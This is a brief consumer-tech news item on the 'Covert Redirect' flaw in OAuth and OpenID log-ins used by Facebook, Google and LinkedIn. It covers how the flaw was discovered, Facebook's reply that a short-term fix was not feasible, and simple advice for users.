Though Facebook wasn’t compromised by the Heartbleed bug several weeks ago, there was another bug in open source discovered this week could affect the site. According to CNET, a Ph.D. student in Singapore discovered a hole in the OAuth and OpenID log-in tools that are used by Facebook, Google, LinkedIn and many other large websites.
The security flaw, called “Covert Redirect,” works by faking a log-in popup window for a website and asking users to sign in to authorize use of an app. This bug is hard to detect because it uses the actual domain of the websites instead of a fake one, which is the usual telltale sign of malware. Once users log in, cyber-scammers can steal their login data and redirect them to malicious sites.
The Ph.D. student who discovered the loophole says that he contacted Facebook about the potential problem, though the site responded by telling him that the issue was too big to solve “in the short term” because of the number of apps on the site that would have to comply with new rules.
However, though bugs like this may be hard to stop, users can easily protect themselves. If you click on a link and are immediately prompted to log in to your Facebook account, close out of the tab immediately. This will prevent any breach of your private info.